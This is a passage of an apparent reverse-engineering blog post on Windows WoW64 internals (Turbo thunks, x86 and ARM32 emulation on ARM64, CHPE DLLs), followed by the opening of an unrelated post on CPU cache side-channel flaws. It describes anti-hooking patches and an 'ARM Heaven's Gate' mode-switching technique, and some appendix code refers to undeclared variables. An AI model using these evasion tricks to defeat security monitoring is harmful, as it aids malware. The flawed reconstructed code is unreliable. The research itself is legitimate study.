The sign-extension of HANDLE makes sense, because if we pass there an INVALID_HANDLE_VALUE, which happens to be 0xFFFFFFFF (-1) on 32-bits, we don’t want to convert this value to 0x00000000FFFFFFFF, but 0xFFFFFFFFFFFFFFFF.

On the other hand, if the TurboThunkNumber is 0, the call will end up in theTurboDispatchJumpAddressEnd which in turn calls wow64!Wow64SystemServiceEx. You can consider this case as the “slow path”.

Disabling Turbo thunks

On Windows x64, the Turbo thunk optimization can be actually disabled!

In one of the previous sections I’ve been talking about ntdll32!NtWow64CallFunction64 andwow64!Wow64CallFunctionTurboThunkControl functions. As with any other NtWow64* function, NtWow64CallFunction64 is only available in the WoW64 ntdll.dll. This function can be called with an index to WoW64 function in the Wow64FunctionDispatch64 table (you could see earlier).

The function prototype might look like this:

typedef enum _WOW64_FUNCTION {
Wow64Function64Nop,
Wow64FunctionQueryProcessDebugInfo,
Wow64FunctionTurboThunkControl,
Wow64FunctionCfgDispatchControl,
Wow64FunctionOptimizeChpeImportThunks,
} WOW64_FUNCTION;
NTSYSCALLAPI
NTSTATUS
NTAPI
NtWow64CallFunction64(
_In_ WOW64_FUNCTION Wow64Function,
_In_ ULONG Flags,
_In_ ULONG InputBufferLength,
_In_reads_bytes_opt_(InputBufferLength) PVOID InputBuffer,
_In_ ULONG OutputBufferLength,
_Out_writes_bytes_opt_(OutputBufferLength) PVOID OutputBuffer,
_Out_opt_ PULONG ReturnLength
);

NOTE: This function prototype has been reconstructed with the help of thewow64!Wow64CallFunction64Nop function code, which just logs the parameters.

We can see that wow64!Wow64CallFunctionTurboThunkControl can be called with an index of 2. This function performs some sanity checks and then passes callswow64cpu!BTCpuTurboThunkControl(*(ULONG*)InputBuffer).

wow64cpu!BTCpuTurboThunkControl then checks the input parameter.

  • If it’s 0, it patches every target of the jump table to point to TurboDispatchJumpAddressEnd(remember, this is the target that is called when WOW64_SYSTEM_SERVICE.TurboThunkNumber is 0).
  • If it’s non-0, it returns STATUS_NOT_SUPPORTED.

This means 2 things:

  • Calling wow64cpu!BTCpuTurboThunkControl(0) disables the Turbo thunks, and every system call ends up taking the “slow path”.
  • It is not possible to enable them back.

With all this in mind, we can achieve disabling Turbo thunks by this call:

#define WOW64_TURBO_THUNK_DISABLE 0
#define WOW64_TURBO_THUNK_ENABLE 1 // STATUS_NOT_SUPPORTED 🙁
ThunkInput = WOW64_TURBO_THUNK_DISABLE;
Status = NtWow64CallFunction64(Wow64FunctionTurboThunkControl,
0,
sizeof(ThunkInput),
&ThunkInput,
0,
NULL,
NULL);

What it might be good for? I can think of 3 possible use-cases:

  • If we deploy custom wow64log.dll (explained earlier), disabling Turbo thunks guarantees that we will see every WoW64 system call in our wow64log!Wow64LogSystemService callback. We wouldn’t see such calls if the Turbo thunks were enabled, because they would take the “fast path” inside of the wow64cpu.dll where the syscall would be executed.
  • If we decide to hook Nt* functions in the native ntdll.dll, disabling Turbo thunks guarantees that for each Nt* function called in the ntdll32.dll, the correspondint Nt* function will be called in the native ntdll.dll. (This is basically the same point as the previous one.)

    NOTE: Keep in mind that this only applies on system calls, i.e. on Nt* or Zw* functions. Other functions are not called from the 32-bit ntdll.dll to the 64-bit ntdll.dll. For example, if we hooked RtlDecompressBuffer in the native ntdll.dll of the WoW64 process, it wouldn’t be called on ntdll32!RtlDecompressBuffer call. This is because the full implementaion of the Rtl*functions is already in the ntdll32.dll.

  • We can “harmlessly” patch high-word moved to the eax in every WoW64 system call stub to 0. For example we could see in NtWaitForSingleObject there is mov eax, 0D0004h. If we patched appropriate 2 bytes in that instruction so that the instruction would become mov eax, 4h, the system call would still work.This approach can be used as an anti-hooking technique — if there’s a jump at the start of the function, the patch will break it. If there’s not a jump, we just disable the Turbo thunk for this function.

x86 on ARM64

Emulation of x86 applications on ARM64 is handled by an actual binary translation. Instead of wow64cpu.dll, the xtajit.dll (probably shortcut for “x86 to ARM64 JIT”) is used for its emulation. As with other emulation DLLs, this DLL is native (ARM64).

The x86 emulation on Windows ARM64 consists also of other “XTA” components:

  • xtac.exe — XTA Compiler
  • XtaCache.exe — XTA Cache Service

Execution of x86 programs on ARM64 appears to go way behind just emulation. It is also capable of caching already binary-translated code, so that next execution of the same application should be faster. This cache is located in the Windows\XtaCache directory which contains files in format FILENAME.EXT.HASH1.HASH2.mp.N.jc. These files are then mapped to the user-mode address space of the application. If you’re asking whether you can find an actual ARM64 code in these files — indeed, you can.

The whole “XTA” and its internals are not in the focus of this article, but they would definitely deserve a separate article.

Unfortunatelly, Microsoft doesn’t provide symbols to any of these xta* DLLs or executables. But if you’re feeling adventurous, you can find some interesting artifacts, like this array of structures inside of the xtajit.dll, which contains name of the function and its pointer. There are thousands of items in this array:

BT functions (before) (ARM64)
BT functions (before) (ARM64)

With a simple Python script, we can mass-rename all functions referenced in this array:

begin = 0x01800A8C20
end = 0x01800B7B4F
struct_size = 24
ea = begin
while ea < end:
ea += struct_size
name = idc.GetString(idc.Qword(ea))
idc.MakeName(idc.Qword(ea+8), name)
view raw2_IDA_BT_rename.py hosted with ❤ by GitHub

I’d like to thank Milan Boháček for providing me this script.

BT functions (after) (ARM64)
BT functions (after) (ARM64)
BT translated function list (ARM64)
BT translated function list (ARM64)

Windows\SyCHPE32 & Windows\SysWOW64

One thing you can observe on ARM64 is that it contains two folders used for x86 emulation. The difference between them is that SyCHPE32 contains small subset of DLLs that are frequently used by applications, while contents of the SysWOW64 folder is quite identical with the content of this folder on Windows x64.

The CHPE DLLs are not pure-x86 DLLs and not even pure-ARM64 DLLs. They are “compiled-hybrid-PE”s. What does it mean? Let’s see:

NtMapViewOfSection (CHPE) (ARM64)
NtMapViewOfSection (CHPE) (ARM64)

After opening SyCHPE32\ntdll.dll, IDA will first tell us — unsurprisingly — that it cannot download PDB for this DLL. After looking at randomly chosen Nt* function, we can see that it doesn’t differ from what we would see in the SysWOW64\ntdll.dll. Let’s look at some non-Nt* function:

RtlDecompressBuffer (CHPE) (ARM64)
RtlDecompressBuffer (CHPE) (ARM64)

We can see it contains regular x86 function prologue, immediately followed by x86 function epilogue and then jump somewhere, where it looks like that there’s just garbage.

My guess is that the reason for this prologue is probably compatibility with applications that check whether some particular functions are hooked or not — by checking if the first bytes of the function contain real prologue.

NOTE: Again, if you’re feeling adventurous, you can patch FileHeader.Machine field in the PE header to IMAGE_FILE_MACHINE_ARM64 (0xAA64) and open this file in IDA. You will see a whole lot of correctly resolved ARM64 functions. Again, I’d like to thank to Milan Boháček for this tip.

If your question is “how are these images generated?”, I would answer that I don’t know, but my bet would be on some internal version of Microsoft’s C++ compiler toolchain. This idea appears to be supported by various occurences of the CHPE keyword in the ChakraCore codebase.

ARM32 on ARM64

The loop inside of the wowarmhw!BTCpuSimulate is fairly simple compared to wow64cpu.dll loop:

DECLSPEC_NORETURN
VOID
BTCpuSimulate(
VOID
)
{
NTSTATUS Status;
PCONTEXT Context;
//
// Gets WoW64 CONTEXT structure (ARM32) using
// the RtlWow64GetCurrentCpuArea() function.
//
Status = CpupGetArmContext(&Context, NULL);
if (!NT_SUCCESS(Status))
{
RtlRaiseStatus(Status);
//
// UNREACHABLE
//
return;
}
for (;;)
{
//
// Switch to ARM32 mode and run the emulation.
//
NtCurrentTeb()->TlsSlots[/* 2 */ WOW64_TLS_INCPUSIMULATION] = TRUE;
CpupSwitchTo32Bit(Context);
NtCurrentTeb()->TlsSlots[/* 2 */ WOW64_TLS_INCPUSIMULATION] = FALSE;
//
// When we get here, it means ARM32 code performed a system call.
// Advance instruction pointer to skip the «UND 0F8h» instruction.
//
Context->Pc += 2;
//
// Set LSB (least significat bit) if ARM32 is executing in
// Thumb mode.
//
if (Context->Cpsr & 0x20) {
Context->Pc |= 1;
}
//
// Let wow64.dll emulate the system call. R12 has the system call
// number, Sp points to the stack which contains the system call
// arguments.
//
Context->R0 = Wow64SystemServiceEx(Context->R12, Context->Sp);
}
}

CpupSwitchTo32Bit does nothing else than saving the whole CONTEXT, performing SVC 0xFFFFinstruction and then restoring the CONTEXT.

nt!KiEnter32BitMode / SVC 0xFFFF

I won’t be explaining here how system call dispatching works in the ntoskrnl.exe — Bruce Dang already did an excellent job doing it. This section is a follow up on his article, though.

SVC instruction is sort-of equivalent of SYSCALL instruction on ARM64 — it basically enters the kernel mode. But there is a small difference between SYSCALL and SVC: while on Windows x64 the system call number is moved into the eax register, on ARM64 the system call number can be encoded directly into the SVC instruction.

SVC 0xFFFF (ARM64)
SVC 0xFFFF (ARM64)

Let’s peek for a moment into the kernel to see how is this SVC instruction handled:

  • nt!KiUserExceptionHandler
    • nt!KiEnter32BitMode
KiUserExceptionHandler (ARM64)
KiUserExceptionHandler (ARM64)
KiEnter32BitMode (ARM64)
KiEnter32BitMode (ARM64)

We can see that:

  • MRS X30, ELR_EL1 — current interrupt-return address (stored in ELR_EL1 system register) will be moved to the register X30 (link register — LR).
  • MSR ELR_EL1, X15 — the interrupt-return address will be replaced by value in the register X15(which is aliased to the instruction pointer register — PC — in the 32-bit mode).
  • ORR X16, X16, #0b10000 — bit [4] is being set in X16 which is later moved to the SPSR_EL1register. Setting this bit switches the execution mode to 32-bits.

Simply said, in the X15 register, there is an address that will be executed once we leave the kernel-mode and enter the user-mode — which happens with the ERET instruction at the end.

nt!KiExit32BitMode / UND #0xF8

Alright, we’re in the 32-bit ARM mode now, how exactly do we leave? Windows solves this transition via UND instruction — which is similar to the UD2 instruction on the Intel CPUs. If you’re not familiar with it, you just need to know that it is instruction that basically guarantees that it’ll throw “invalid instruction” exception which can OS kernel handle. It is defined-“undefined instruction”. Again there is the same difference between the UND and UD2 instruction in that the ARM can have any 1-byte immediate value encoded directly in the instruction.

Let’s look at the NtMapViewOfSection system call in the SysArm32\ntdll.dll:

NtMapViewOfSection (ARM64)
NtMapViewOfSection (ARM64)

Let’s peek into the kernel again:

  • nt!KiUser32ExceptionHandler
    • nt!KiFetchOpcodeAndEmulate
      • nt!KiExit32BitMode
KiEnter32BitMode (ARM64)
KiEnter32BitMode (ARM64)
KiEnter32BitMode (ARM64)
KiEnter32BitMode (ARM64)

Keep in mind that meanwhile the 32-bit code is running, it cannot modify the value of the previously stored X30 register — it is not visible in 32-bit mode. It stays there the whole time. Upon UND #0xF8 execution, following happens:

  • the KiFetchOpcodeAndEmulate function moves value of X30 into X24 register (not shown on the screenshot).
  • AND X19, X16, #0xFFFFFFFFFFFFFFC0 — bit [4] (among others) is being cleared in the X19register, which is later moved to the SPSR_EL1 register. Clearing this bit switches the execution mode back to 64-bits.
  • KiExit32BitMode then moves the value of X24 register into the ELR_EL1 register. That means when this function finishes its execution, the ERET brings us back to the 64bit code, right after the SVC 0xFFFF instruction.

NOTE: It can be noticed that Windows uses UND instruction for several purposes. Common example might also be UND #0xFE which is used as a breakpoint instruction (equivalent of __debugbreak() / int3)

As you could spot, 3 kernel transitions are required for emulation of the system call (SVC 0xFFFF, system call itself, UND 0xF8). This is because on ARM there doesn’t exist a way how to switch between 32-bit and 64-bit mode only in user-mode.

If you’re looking for “ARM Heaven’s Gate” — this is it. Put whatever function address you like into the X15 register and execute SVC 0xFFFF. Next instruction will be executed in the 32-bit ARM mode, starting with that address. When you feel you’d like to come back into 64-bit mode, simply execute UND #0xF8 and your execution will continue with the next instruction after the SVC 0xFFFF.

Appendix

////////////////////////////////////////////////////////////////////////////////
// General definitions.
////////////////////////////////////////////////////////////////////////////////
//
// Context flags.
// winnt.h (Windows SDK)
//
#define CONTEXT_i386 0x00010000L
#define CONTEXT_AMD64 0x00100000L
#define CONTEXT_ARM 0x00200000L
#define CONTEXT_ARM64 0x00400000L
//
// Machine type.
// winnt.h (Windows SDK)
//
#define IMAGE_FILE_MACHINE_TARGET_HOST 0x0001 // Useful for indicating we want to interact with the host and not a WoW guest.
#define IMAGE_FILE_MACHINE_I386 0x014c // Intel 386.
#define IMAGE_FILE_MACHINE_ARMNT 0x01c4 // ARM Thumb-2 Little-Endian
#define IMAGE_FILE_MACHINE_ARM64 0xAA64 // ARM64 Little-Endian
#define IMAGE_FILE_MACHINE_CHPE_X86 0x3A64 // Hybrid PE (defined in ntimage.h (WDK))
////////////////////////////////////////////////////////////////////////////////
// ntoskrnl.exe
////////////////////////////////////////////////////////////////////////////////
typedef struct _PS_NTDLL_EXPORT_ITEM {
PCSTR RoutineName;
PVOID RoutineAddress;
} PS_NTDLL_EXPORT_ITEM, *PPS_NTDLL_EXPORT_ITEM;
PS_NTDLL_EXPORT_ITEM NtdllExports[] = {
//
// 19 exports on x64
// 14 exports on ARM64
//
};
PVOID PsWowX86SharedInformation[Wow64SharedPageEntriesCount];
PS_NTDLL_EXPORT_ITEM NtdllWowX86Exports[] = {
{ «LdrInitializeThunk«,
&PsWowX86SharedInformation[SharedNtdll32LdrInitializeThunk] },
{ «KiUserExceptionDispatcher«,
&PsWowX86SharedInformation[SharedNtdll32KiUserExceptionDispatcher] },
{ «KiUserApcDispatcher«,
&PsWowX86SharedInformation[SharedNtdll32KiUserApcDispatcher] },
{ «KiUserCallbackDispatcher«,
&PsWowX86SharedInformation[SharedNtdll32KiUserCallbackDispatcher] },
{ «RtlUserThreadStart«,
&PsWowX86SharedInformation[SharedNtdll32RtlUserThreadStart] },
{ «RtlpQueryProcessDebugInformationRemote«,
&PsWowX86SharedInformation[SharedNtdll32pQueryProcessDebugInformationRemote] },
{ «LdrSystemDllInitBlock«,
&PsWowX86SharedInformation[SharedNtdll32LdrSystemDllInitBlock] },
{ «RtlpFreezeTimeBias«,
&PsWowX86SharedInformation[SharedNtdll32RtlpFreezeTimeBias] },
};
#ifdef _M_ARM64
PVOID PsWowArm32SharedInformation[Wow64SharedPageEntriesCount];
PS_NTDLL_EXPORT_ITEM NtdllWowArm32Exports[] = {
//
// …
//
};
PVOID PsWowAmd64SharedInformation[Wow64SharedPageEntriesCount];
PS_NTDLL_EXPORT_ITEM NtdllWowAmd64Exports[] = {
//
// …
//
};
PVOID PsWowChpeX86SharedInformation[Wow64SharedPageEntriesCount];
PS_NTDLL_EXPORT_ITEM NtdllWowChpeX86Exports[] = {
//
// …
//
};
#endif // _M_ARM64
//
// …
//
typedef struct _PS_NTDLL_EXPORT_INFORMATION {
PPS_NTDLL_EXPORT_ITEM NtdllExports;
SIZE_T Count;
} PS_NTDLL_EXPORT_INFORMATION, *PPS_NTDLL_EXPORT_INFORMATION;
//
// RTL_NUMBER_OF(NtdllExportInformation)
// == 6
// == (SYSTEM_DLL_TYPE)PsSystemDllTotalTypes
//
PS_NTDLL_EXPORT_INFORMATION NtdllExportInformation[PsSystemDllTotalTypes] = {
{ NtdllExports, RTL_NUMBER_OF(NtdllExports) },
{ NtdllWowX86Exports, RTL_NUMBER_OF(NtdllWowX86Exports) },
#ifdef _M_ARM64
{ NtdllWowArm32Exports, RTL_NUMBER_OF(NtdllWowArm32Exports) },
{ NtdllWowAmd64Exports, RTL_NUMBER_OF(NtdllWowAmd64Exports) },
{ NtdllWowChpeX86Exports, RTL_NUMBER_OF(NtdllWowChpeX86Exports) },
#endif // _M_ARM64
//
// { NULL, 0 } for the rest…
//
};
typedef struct _PS_SYSTEM_DLL_INFO {
//
// Flags.
// Initialized statically.
//
USHORT Flags;
//
// Machine type of this WoW64 NTDLL.
// Initialized statically.
// Examples:
// — IMAGE_FILE_MACHINE_I386
// — IMAGE_FILE_MACHINE_ARMNT
//
USHORT MachineType;
//
// Unused, always 0.
//
ULONG Reserved1;
//
// Path to the WoW64 NTDLL.
// Initialized statically.
// Examples:
// — «\\SystemRoot\\SysWOW64\\ntdll.dll»
// — «\\SystemRoot\\SysArm32\\ntdll.dll»
//
UNICODE_STRING Ntdll32Path;
//
// Image base of the DLL.
// Initialized at runtime by PspMapSystemDll.
// Equivalent of:
// RtlImageNtHeader(BaseAddress)->
// OptionalHeader.ImageBase;
//
PVOID ImageBase;
//
// Contains DLL name (such as «ntdll.dll» or
// «ntdll32.dll») before runtime initialization.
// Initialized at runtime by MmMapViewOfSectionEx,
// called from PspMapSystemDll.
//
union {
PVOID BaseAddress;
PWCHAR DllName;
};
//
// Unused, always 0.
//
PVOID Reserved2;
//
// Section relocation information.
//
PVOID SectionRelocationInformation;
//
// Unused, always 0.
//
PVOID Reserved3;
} PS_SYSTEM_DLL_INFO, *PPS_SYSTEM_DLL_INFO;
typedef struct _PS_SYSTEM_DLL {
//
// _SECTION* object of the DLL.
// Initialized at runtime by PspLocateSystemDll.
//
union {
EX_FAST_REF SectionObjectFastRef;
PVOID SectionObject;
};
//
// Push lock.
//
EX_PUSH_LOCK PushLock;
//
// System DLL information.
// This part is returned by PsQuerySystemDllInfo.
//
PS_SYSTEM_DLL_INFO SystemDllInfo;
} PS_SYSTEM_DLL, *PPS_SYSTEM_DLL;
////////////////////////////////////////////////////////////////////////////////
// ntdll.dll
////////////////////////////////////////////////////////////////////////////////
ULONG
RtlpArchContextFlagFromMachine(
_In_ USHORT MachineType
)
/*++
Routine description:
This routine translates architecture-specific CONTEXT
flag to the machine type.
Arguments:
MachineType — One of IMAGE_FILE_MACHINE_* values.
Return Value:
Context flag.
Note:
RtlpArchContextFlagFromMachine can be found only in
ntoskrnl.exe symbols, but from ntdll.dll disassembly
it is obvious that this function is present there
as well (probably __forceinline’d, or used as a macro).
—*/
{
switch (MachineType)
{
case IMAGE_FILE_MACHINE_I386:
return CONTEXT_i386;
case IMAGE_FILE_MACHINE_AMD64:
return CONTEXT_AMD64;
case IMAGE_FILE_MACHINE_ARMNT:
return CONTEXT_ARM;
case IMAGE_FILE_MACHINE_ARM64:
return CONTEXT_ARM64;
default:
return 0;
}
}
ULONG
RtlpGetLegacyContextLength(
_In_ ULONG ArchContextFlag,
_Out_opt_ PULONG SizeOfContext,
_Out_opt_ PULONG AlignOfContext
)
/*++
Routine description:
This routine determines size and alignment of the architecture-
-specific CONTEXT structure.
Arguments:
ArchContextFlag — Architecture-specific CONTEXT flag.
SizeOfContext — Receives sizeof(CONTEXT).
AlignOfContext — Receives __alignof(CONTEXT).
Return Value:
Alignment of the CONTEXT structure.
Note:
You can find corresponding DECLSPEC_ALIGN specifiers
for each CONTEXT structure in the winnt.h (Windows SDK).
By WOW64_CONTEXT_* here is meant an original CONTEXT
structure for the specific architecture (as CONTEXT
structures for other architectures are not available,
because it is selected during compile-time).
—*/
{
ULONG SizeOf = 0;
ULONG AlignOf = 0;
switch (ArchContextFlag)
{
case CONTEXT_i386:
SizeOf = sizeof(WOW64_CONTEXT_i386);
AlignOf = __alignof(WOW64_CONTEXT_i386); // 4
break;
case CONTEXT_AMD64:
SizeOf = sizeof(WOW64_CONTEXT_AMD64);
AlignOf = __alignof(WOW64_CONTEXT_AMD64); // 16
break;
case CONTEXT_ARM:
SizeOf = sizeof(WOW64_CONTEXT_ARM);
AlignOf = __alignof(WOW64_CONTEXT_ARM); // 8
break;
case CONTEXT_ARM64:
SizeOf = sizeof(WOW64_CONTEXT_ARM64);
AlignOf = __alignof(WOW64_CONTEXT_ARM64); // 16
break;
}
if (SizeOfContext) {
*SizeOfContext = SizeOf;
}
if (AlignOfContext) {
*AlignOfContext = AlignOf;
}
return AlignOf;
}
PULONG
RtlpGetContextFlagsLocation(
_In_ PCONTEXT_UNION Context,
_In_ ULONG ArchContextFlag
)
/*++
Routine description:
This routine returns pointer to the the «ContextFlags»
member of the CONTEXT structure.
Arguments:
Context — Architecture-specific CONTEXT structure.
ArchContextFlag — Architecture-specific CONTEXT flag.
Return Value:
Pointer to the the «ContextFlags» member.
—*/
{
//
// ContextFlags is always the first member of the
// CONTEXT struct — except for AMD64.
//
switch (ArchContextFlag)
{
case CONTEXT_i386:
return &Context->X86.ContextFlags; // Context + 0x00
case CONTEXT_AMD64:
return &Context->X64.ContextFlags; // Context + 0x30
case CONTEXT_ARM:
return &Context->ARM.ContextFlags; // Context + 0x00
case CONTEXT_ARM64:
return &Context->ARM64.ContextFlags; // Context + 0x00
default:
//
// Assume first member (Context + 0x00).
//
return (PULONG)Context;
}
}
//
// Architecture-specific WoW64 structure,
// holding the machine type and context
// structure.
//
#define WOW64_CPURESERVED_FLAG_RESET_STATE 1
typedef struct _WOW64_CPURESERVED {
USHORT Flags;
USHORT MachineType;
//
// CONTEXT has different alignment for
// each architecture and its location
// is determined at runtime (see
// RtlWow64GetCpuAreaInfo below).
//
// CONTEXT Context;
// CONTEXT_EX ContextEx;
//
} WOW64_CPURESERVED, *PWOW64_CPURESERVED;
typedef struct _WOW64_CPU_AREA_INFO {
PCONTEXT_UNION Context;
PCONTEXT_EX ContextEx;
PVOID ContextFlagsLocation;
PWOW64_CPURESERVED CpuReserved;
ULONG ContextFlag;
USHORT MachineType;
} WOW64_CPU_AREA_INFO, *PWOW64_CPU_AREA_INFO;
NTSTATUS
RtlWow64GetCpuAreaInfo(
_In_ PWOW64_CPURESERVED CpuReserved,
_In_ ULONG Reserved,
_Out_ PWOW64_CPU_AREA_INFO CpuAreaInfo
)
/*++
Routine description:
This routine returns architecture- and WoW64-specific
information based on the CPU-reserved region. It is
used mainly for fetching MachineType and the pointer
to the architecture-specific CONTEXT structure (which
is part of the WOW64_CPURESERVED structure). Because
the CONTEXT structure has different size and alignment
for each architecture, the pointer must be obtained
dynamically.
Arguments:
CpuReserved — WoW64 CPU-reserved region, usually located
at NtCurrentTeb()->TlsSlots[/* 1 */ WOW64_TLS_CPURESERVED]
Reserved — Unused. All callers set this argument to 0.
CpuAreaInfo — Receives the CPU-area information.
Return Value:
STATUS_SUCCESS — on success
STATUS_INVALID_PARAMETER — if CpuReserved contains invalid MachineType
*/
{
ULONG ContextFlag;
ULONG SizeOfContext;
ULONG AlignOfContext;
//
// In the ntdll.dll, this call is probably inlined, because
// RtlpArchContextFlagFromMachine symbol is not present there.
//
ContextFlag = RtlpArchContextFlagFromMachine(CpuReserved->MachineType);
if (!ContextFlag) {
return STATUS_INVALID_PARAMETER;
}
RtlpGetLegacyContextLength(ContextFlag, &SizeOfContext, &AlignOfContext);
//
// CpuAreaInfo->Context = &CpuReserved->Context;
// CpuAreaInfo->ContextEx = &CpuReserved->ContextEx;
//
CpuAreaInfo->Context = ALIGN_UP_POINTER_BY(
(PUCHAR)CpuArea + sizeof(WOW64_CPU_AREA),
AlignOfContext
);
CpuAreaInfo->ContextEx = ALIGN_UP_POINTER_BY(
(PUCHAR)Context + SizeOfContext + sizeof(CONTEXT_EX),
sizeof(PVOID)
);
CpuAreaInfo->ContextFlagsLocation = ContextFlagsLocation;
CpuAreaInfo->CpuArea = CpuArea;
CpuAreaInfo->ContextFlag = ContextFlag;
CpuAreaInfo->MachineType = CpuReserved->MachineType;
return STATUS_SUCCESS;
}
////////////////////////////////////////////////////////////////////////////////
// wow64.dll
////////////////////////////////////////////////////////////////////////////////
//
// WOW64INFO, based on:
// wow64t.h (WRK: https://github.com/mic101/windows/blob/master/WRK-v1.2/public/internal/base/inc/wow64t.h#L269)
//
#define WOW64_CPUFLAGS_MSFT64 0x00000001
#define WOW64_CPUFLAGS_SOFTWARE 0x00000002
typedef struct _WOW64INFO {
ULONG NativeSystemPageSize;
ULONG CpuFlags;
ULONG Wow64ExecuteFlags;
ULONG Unknown1;
USHORT NativeMachineType;
USHORT EmulatedMachineType;
} WOW64INFO, *PWOW64INFO;
//
// Thread Local Storage (TLS) support. TLS slots are statically allocated.
// wow64tls.h (WRK: https://github.com/mic101/windows/blob/master/WRK-v1.2/public/internal/base/inc/wow64tls.h#L23)
// Note: Not all fields probably matches their names on Windows 10.
//
#define WOW64_TLS_STACKPTR64 0 // contains 64-bit stack ptr when simulating 32-bit code
#define WOW64_TLS_CPURESERVED 1 // per-thread data for the CPU simulator
#define WOW64_TLS_INCPUSIMULATION 2 // Set when inside the CPU
#define WOW64_TLS_TEMPLIST 3 // List of memory allocated in thunk call.
#define WOW64_TLS_EXCEPTIONADDR 4 // 32-bit exception address (used during exception unwinds)
#define WOW64_TLS_USERCALLBACKDATA 5 // Used by win32k callbacks
#define WOW64_TLS_EXTENDED_FLOAT 6 // Used in ia64 to pass in floating point
#define WOW64_TLS_APCLIST 7 // List of outstanding usermode APCs
#define WOW64_TLS_FILESYSREDIR 8 // Used to enable/disable the filesystem redirector
#define WOW64_TLS_LASTWOWCALL 9 // Pointer to the last wow call struct (Used when wowhistory is enabled)
#define WOW64_TLS_WOW64INFO 10 // Wow64Info address (structure shared between 32-bit and 64-bit code inside Wow64).
#define WOW64_TLS_INITIAL_TEB32 11 // A pointer to the 32-bit initial TEB
#define WOW64_TLS_PERFDATA 12 // A pointer to temporary timestamps used in perf measurement
#define WOW64_TLS_DEBUGGER_COMM 13 // Communicate with 32bit debugger for event notification
#define WOW64_TLS_INVALID_STARTUP_CONTEXT 14 // Used by IA64 to indicate an invalid startup context. After startup, it stores a pointer to the context.
#define WOW64_TLS_SLIST_FAULT 15 // Used to retry RtlpInterlockedPopEntrySList faults
#define WOW64_TLS_UNWIND_NATIVE_STACK 16 // Forces an unwind of the native 64-bit stack after an APC
#define WOW64_TLS_APC_WRAPPER 17 // Holds the Wow64 APC jacket routine
#define WOW64_TLS_IN_SUSPEND_THREAD 18 // Indicates the current thread is in the middle of NtSuspendThread. Used by software CPUs.
#define WOW64_TLS_MAX_NUMBER 19 // Maximum number of TLS slot entries to allocate
typedef struct _WOW64_ERROR_CASE {
ULONG Case;
NTSTATUS TransformedStatus;
} WOW64_ERROR_CASE, *PWOW64_ERROR_CASE;
typedef struct _WOW64_SERVICE_TABLE_DESCRIPTOR {
//
// struct _KSERVICE_TABLE_DESCRIPTOR {
//
// //
// // Pointer to a system call table (array of function pointers).
// //
//
// PULONG_PTR Base;
//
// //
// // Pointer to a system call count table.
// // This field has been set only on checked (debug) builds,
// // where the Count (with the corresponding system call index)
// // has been incremented with each system call.
// // On non-checked builds it is set to NULL.
// //
//
// PULONG Count;
//
// //
// // Maximum number of items in the system call table.
// // In ntoskrnl.exe it corresponds with the actual number
// // of system calls. In wow64.dll it is set to 4096.
// //
//
// ULONG Limit;
//
// //
// // Pointer to a system call argument table.
// // The elements in this table actually contain how many
// // bytes on the stack are assigned to the function parameters
// // for a particular system call.
// // On 32-bit systems, if you divide this number by 4, you’ll
// // get the the number of arguments that the system call expects.
// //
//
// PUCHAR Number;
// };
//
KSERVICE_TABLE_DESCRIPTOR Descriptor;
//
// Extended fields of the WoW64 servie table:
// Wow64HandleSystemServiceError
//
WOW64_ERROR_CASE ErrorCaseDefault;
PWOW64_ERROR_CASE ErrorCase;
} WOW64_SERVICE_TABLE_DESCRIPTOR, *PWOW64_SERVICE_TABLE_DESCRIPTOR;
#define WOW64_NTDLL_SERVICE_INDEX 0
#define WOW64_WIN32U_SERVICE_INDEX 1
#define WOW64_KERNEL32_SERVICE_INDEX 2
#define WOW64_USER32_SERVICE_INDEX 3
#define WOW64_SERVICE_TABLE_MAX 4
WOW64_SERVICE_TABLE_DESCRIPTOR ServiceTables[WOW64_SERVICE_TABLE_MAX];
typedef struct _WOW64_LOG_SERVICE
{
PVOID Reserved;
PULONG Arguments;
ULONG ServiceTable;
ULONG ServiceNumber;
NTSTATUS Status;
BOOLEAN PostCall;
} WOW64_LOG_SERVICE, *PWOW64_LOG_SERVICE;
NTSTATUS
Wow64HandleSystemServiceError(
_In_ NTSTATUS ExceptionStatus,
_In_ PWOW64_LOG_SERVICE LogService
)
/*++
Routine description:
This routine transforms exception from native system
call to WoW64-compatible NTSTATUS.
Arguments:
ExceptionStatus — NTSTATUS raised from executing system call.
LogService — Information about the WoW64 system call.
Return Value:
Transformed NTSTATUS.
—*/
{
PWOW64_SERVICE_TABLE_DESCRIPTOR ServiceTable;
PWOW64_ERROR_CASE ErrorCaseTable;
ULONG ErrorCase;
NTSTATUS TransformedStatus;
ErrorCaseTable = ServiceTables[LogService->ServiceTable].ErrorCase;
if (!ErrorCaseTable)
{
ErrorCaseTable = &ServiceTables[LogService->ServiceTable].ErrorCaseDefault;
}
ErrorCase = ErrorCaseTable[LogService->ServiceNumber].ErrorCase;
TransformedStatus = ErrorCaseTable[LogService->ServiceNumber].TransformedStatus;
switch (ErrorCase)
{
case 0:
return ExceptionStatus;
case 1:
NtCurrentTeb()->LastErrorValue = RtlNtStatusToDosError(ExceptionStatus);
return ExceptionStatus;
case 2:
return TransformedStatus;
case 3:
NtCurrentTeb()->LastErrorValue = RtlNtStatusToDosError(ExceptionStatus);
return TransformedStatus;
default:
return STATUS_INVALID_PARAMETER;
}
}
view raw2_appendix.h hosted with ❤ by GitHub

References

How does one retrieve the 32-bit context of a Wow64 program from a 64-bit process on Windows Server 2003 x64?
http://www.nynaeve.net/?p=191

Mixing x86 with x64 code
http://blog.rewolf.pl/blog/?p=102

Windows 10 on ARM
https://channel9.msdn.com/Events/Build/2017/P4171

Knockin’ on Heaven’s Gate – Dynamic Processor Mode Switching
http://rce.co/knockin-on-heavens-gate-dynamic-processor-mode-switching/

Closing “Heaven’s Gate”
http://www.alex-ionescu.com/?p=300

Реклама

AMD ARM Reading privileged memory with a side-channel

We have discovered that CPU data cache timing can be abused to efficiently leak information out of mis-speculated execution, leading to (at worst) arbitrary virtual memory read vulnerabilities across local security boundaries in various contexts.

 

Variants of this issue are known to affect many modern processors, including certain processors by Intel, AMD and ARM. For a few Intel and AMD CPU models, we have exploits that work against real software. We reported this issue to Intel, AMD and ARM on 2017-06-01 [1].

 

So far, there are three known variants of the issue:

 

  • Variant 1: bounds check bypass (CVE-2017-5753)
  • Variant 2: branch target injection (CVE-2017-5715)
  • Variant 3: rogue data cache load (CVE-2017-5754)

 

Before the issues described here were publicly disclosed, Daniel Gruss, Moritz Lipp, Yuval Yarom, Paul Kocher, Daniel Genkin, Michael Schwarz, Mike Hamburg, Stefan Mangard, Thomas Prescher and Werner Haas also reported them; their [writeups/blogposts/paper drafts] are at:

 

 

